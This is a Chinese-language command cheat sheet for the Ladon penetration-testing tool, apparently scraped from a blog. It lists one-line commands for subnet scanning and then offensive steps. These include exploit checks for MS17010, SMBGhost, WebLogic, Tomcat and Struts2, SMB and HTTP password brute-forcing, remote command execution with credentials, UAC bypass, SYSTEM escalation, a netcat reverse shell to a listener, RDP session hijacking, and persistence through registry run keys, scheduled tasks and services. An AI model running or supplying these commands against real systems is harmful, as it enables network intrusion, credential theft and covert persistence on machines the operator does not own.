1. 例如扫描 ms17010(必须加 noping)
1
2
Ladon noping 192.168.8.1/24 MS17010
//扫描c段
image-20200831144138877
image-20200831144138877
image-20200831150742390
image-20200831150742390

资产扫描、指纹识别、服务识别、存活主机、端口扫描

  1. 多协议探测存活主机 (IP、机器名、MAC 地址、制造商)

Ladon 192.168.3.8/24 OnlinePC

  1. 多协议识别操作系统 (IP、机器名、操作系统版本、开放服务)
1
Ladon 192.168.1.8/24 OsScan
  1. 扫描存活主机
1
Ladon 192.168.1.8/24 OnlineIP
  1. ICMP 扫描存活主机
1
Ladon 192.168.1.8/24 Ping
  1. SMBGhost 漏洞检测 CVE-2020-0796
1
Ladon 192.168.1.8/24 SMBGhost
  1. 扫描 Web 信息/Http 服务
1
Ladon 192.168.1.8/24 WebScan
  1. 扫描 C 段站点 URL 域名
1
2
Ladon 192.168.1.8/24 UrlScan
Ladon 192.168.1.8/24 SameWeb
  1. 域内机器信息获取
1
Ladon AdiDnsDump 192.168.1.8 (Domain IP)
  1. 扫描 C 段端口、指定端口扫描
1
2
Ladon 192.168.1.8/24 PortScan
Ladon 192.168.1.8 PortScan 80,445,3389
  1. 扫描 C 段 WEB 以及 CMS(75 种 Web 指纹识别)
1
Ladon 192.168.1.8/24 WhatCMS
  1. 扫描思科设备
1
2
Ladon 192.168.1.8/24 CiscoScan
Ladon http://192.168.1.8 CiscoScan
  1. 枚举 Mssql 数据库主机 (数据库 IP、机器名、SQL 版本)
1
Ladon EnumMssql
  1. 枚举网络共享资源 (域、存活 IP、共享路径)
1
Ladon EnumShare
  1. 扫描 LDAP 服务器
1
Ladon 192.168.1.8/24 LdapScan
  1. 扫描 ftp 服务器
1
Ladon 192.168.1.8/24 FtpScan
  1. 445 端口-smb 密码爆破 windows
1
Ladon 192.168.1.8/24 SmbScan
  1. 445 端口-smb-ntlm-hash 爆破 windows
1
Ladon 192.168.1.8/24 SmbHashScan
  1. web 端口-401 基础认证密码爆破
1
Ladon http://192.168.1.8/login HttpBasicScan
  1. 445 端口-ipc 密码爆破 windowns
1
Ladon 192.168.1.8/24 IpcScan.ini

漏洞检测/漏洞利用/Poc/Exp

  1. smb 漏洞检测 cve-2017-0143cve-2017-0144
1
Ladon 192.168.1.8/24 MS17010
  1. Weblogic 漏洞检测(CVE-2019-2725/CVE-2018-2894)
1
Ladon 192.168.1.8/24 WeblogicPoc
  1. Tomcat 漏洞检测(CVE-2017-12615)
1
Ladon 192.168.1.8/24 TomcatExp
  1. Struts2 漏洞检测(S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode)
1
Ladon 192.168.1.8/24 Struts2Poc

信息收集

  1. 进程详细信息
1
2
Ladon EnumProcess
Ladon Tasklist
  1. 获取命令行参数
1
2
Ladon cmdline
Ladon cmdline cmd.exe
  1. 获取渗透基础信息
1
2
Ladon GetInfo
Ladon GetInfo2
  1. 445 端口-atexec 远程执行命令(非交互式)
1
Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami

提权降权

  1. BypassUac 绕过 UAC 执行,支持 Win7-Win10
1
2
Ladon BypassUac c:\1.exe
Ladon BypassUac c:\1.bat
  1. GetSystem 提权或降权运行程序
1
2
Ladon GetSystem cmd.exe
Ladon GetSystem cmd.exe explorer
  1. 一键迷你 WEB 服务器
1
2
Ladon WebSer 80
Ladon web 80

反弹 shell

  1. 反弹 TCP NC Shell
1
Ladon ReverseTcp 192.168.1.8 4444 nc
  1. 反弹 TCP MSF Shell
1
2


  1. 078 RDP 桌面会话劫持(无需密码)
1
2
Ladon RDPHijack 3
Ladon RDPHijack 3 console
  1. 查看用户最近访问文件
1
Ladon Recent
  1. 添加注册表 run 启动项
1
Ladon RegAuto Test c:\123.exe
  1. at 计划执行程序无需时间 system 权限
1
2
Ladon at c:\123.exe
Ladon at c:\123.exe gui
  1. SC 服务加启动项&执行程序(system 权限)
1
2
3
4
5
6
Ladon at c:\123.exe
Ladon at c:\123.exe gui

Ladon sc c:\123.exe
Ladon sc c:\123.exe gui
Ladon sc c:\123.exe auto ServerName

——————————————————无名之辈——————————————————-

本文档由瓦雀创建